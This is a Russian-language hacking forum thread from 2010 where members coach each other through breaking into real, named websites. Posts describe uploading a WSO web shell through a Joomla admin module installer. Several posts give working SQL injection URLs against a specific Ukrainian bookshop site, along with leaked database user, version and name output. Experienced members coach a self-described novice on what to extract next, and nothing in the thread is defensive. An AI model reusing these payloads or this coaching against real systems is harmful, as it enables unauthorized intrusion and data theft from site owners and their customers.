Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    проще через шаблоны, если правятся
     
  2. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    LokbatanLi
    То, что надо - работает.
    Кто-нибудь может "на пальцах" объяснить суть бага? В блоге Qwazar'a читал, но там тема несильно раскрыта.

    И, кстати, почему group_concat не воркает в таком запросе?
     
    #12542 Nek1t, 26 Apr 2010
    Last edited: 26 Apr 2010
  3. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    править то можно, только он ошибку выдает
    "Неверная контрольная суммафайла......."

    и в чом фишка немогу понять...
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    GOGA075 скачиваешь joomla xplorer и в админке устанавливаешь данный модуль , если не понял пиши в аську 8383один72
     
    1 person likes this.
  5. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Gorev, спасибо за помощ. Шел еле-еле залил. Прав никаких нету, щитай зря промучался!!
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Нафиг не надо, просто грузишь новый модуль в наглую wso.php, оно напишет "бла-бла-бла, идите нафинг", но шелл таки под оригинальным названием останется в /media/wso.php или /tmp/wso.php
     
  7. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    попробуй такой вариант http://forum.antichat.ru/showpost.php?p=1809203&postcount=173
     
    _________________________
  8. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    может подскажет наши профи насчет моего вопроса?
     
  9. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    shell_c0de, да там прав на самом сервере нету, только чтение скриптов!!
     
  10. ExQ

    ExQ Banned

    Joined:
    8 Apr 2010
    Messages:
    17
    Likes Received:
    9
    Reputations:
    0
    ссори за тупость...
    Есть скуля
    http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+concat_ws(0x3a%20,user(),database(%20%20),version())--

    что делать дальше?(

    новичек в этом деле....
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2ExQ
    там 4 версия..подбирай названия табличеk
     
  12. ExQ

    ExQ Banned

    Joined:
    8 Apr 2010
    Messages:
    17
    Likes Received:
    9
    Reputations:
    0

    Скинь свою icq в пм

    жёсткий ламер в этом(
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2ExQ
    http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+1+from+название таблички --
     
  14. stan_q

    stan_q Member

    Joined:
    1 Aug 2009
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    Ув. форумчане, вопрос следующий: на сайте есть скуль, имеется 1 БД (кроме стандартной). Данных о логине\пароле в этой БД нет. Может ли такое быть, или я что-то неправильно делаю?

    Сам сайт
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    конечно все может быть, данные о юзвере админе могут быть прописаны в файле на сервере...
     
  16. ExQ

    ExQ Banned

    Joined:
    8 Apr 2010
    Messages:
    17
    Likes Received:
    9
    Reputations:
    0
    Что значит эта ошибка?
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/kniga-market/kniga-market.kiev.ua/about.php on line 7
     
  17. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    то что ты ковычку зафигачил в параметр =)) Возможно есть sql inj. ты покажи запрос который ты отправляешь. Если это выдаёт просто скрипт без параметров, то скорее всего он просто криво написан.
     
  18. ExQ

    ExQ Banned

    Joined:
    8 Apr 2010
    Messages:
    17
    Likes Received:
    9
    Reputations:
    0

    http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+1+from+тут название таблички --
     
  19. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    А пройти по указанному линку никак, не?
    http://kniga-market.kiev.ua/about.php - просто бага
    http://kniga-market.kiev.ua/producers.php?category=10' - скуля
    Code:
    http://kniga-market.kiev.ua/producers.php?category=10+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4+--
    u_knigamarke@localhost:4.1.22-log:knigamarket
     
    1 person likes this.
  20. ExQ

    ExQ Banned

    Joined:
    8 Apr 2010
    Messages:
    17
    Likes Received:
    9
    Reputations:
    0

    Ссори.. сильно не пинайте)
    совсем ламер в этих делах :confused:


    Ну а что делать дальше? :(
     
    #12560 ExQ, 27 Apr 2010
    Last edited: 27 Apr 2010
Thread Status:
Not open for further replies.